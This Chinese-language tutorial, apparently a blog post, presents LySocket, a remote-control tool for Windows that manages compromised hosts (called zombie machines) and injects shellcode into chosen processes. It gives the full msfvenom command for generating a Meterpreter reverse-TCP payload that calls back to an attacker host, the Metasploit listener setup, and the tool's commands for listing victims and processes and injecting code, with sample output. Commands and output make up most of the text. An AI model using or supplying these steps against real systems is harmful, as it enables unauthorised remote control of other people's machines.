LySocket 是一款使用纯 WindowsAPI
实现的命令行版远程控制工具,该工具通过最少的代码实现了套接字的批量管理操作,用户可以指定对远程主机内特定进程注入ShellCode
攻击载荷,只要对端LyClient
客户端能一直运行,则Metasploit
攻击载荷就可以很方便的注入到目标主机任意的进程内反弹。
GitHUB地址:https://github.com/lyshark/LySocket
首先需要通过Metasploit
工具生成一个有效载荷。
[root@lyshark ~]# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.93.128 LPORT=9999 -f c
后台侦听器的配置,使用时需要与载荷的位数相对应。
msf6 > use exploit/multi/handler msf6 > set payload windows/meterpreter/reverse_tcp msf6 > set lhost 192.168.93.128 msf6 > set lport 9999 msf6 exploit(multi/handler) > exploit
命令ShowSocket
可输出当前有多少肉鸡上线了,用于确定对端IP地址,该套接字列表程序内会自动维护,如果客户端下线则Socket套接字将会被清理。
[ LySocket ] # ShowSocket -------------------------------------------------------------------- 索引 客户端地址 端口 状态 -------------------------------------------------------------------- 0 127.0 .0 .1 1763 Open1 127.0 .0 .1 1806 Open2 127.0 .0 .1 1807 Open3 127.0 .0 .1 1808 Open--------------------------------------------------------------------
命令GetProcessList
可用于得到对段主机内有哪些进程正在运行,这是注入代码的前提条件。
[ LySocket ] # GetProcessList --address 127.0 .0 .1 -------------------------------------------------------------------- 索引 进程PID 进程位数 进程名 -------------------------------------------------------------------- 0 4 x64 System1 124 x64 Registry2 568 x64 smss.exe3 856 x64 csrss.exe4 956 x64 wininit.exe5 964 x64 csrss.exe6 80 x64 services.exe7 484 x64 lsass.exe8 564 x64 winlogon.exe9 672 x64 svchost.exe10 1060 x64 fontdrvhost.exe11 1068 x64 fontdrvhost.exe12 1100 x64 WUDFHost.exe--------------------------------------------------------------------
使用如下命令注入ShellCode到特定进程内,此时Metasploit
即可看到反弹的了。
[ LySocket ] # InjectRemoteCode --address 127.0 .0 .1 --pid 1068 --shellcode xfec12defferciruq [+] Success..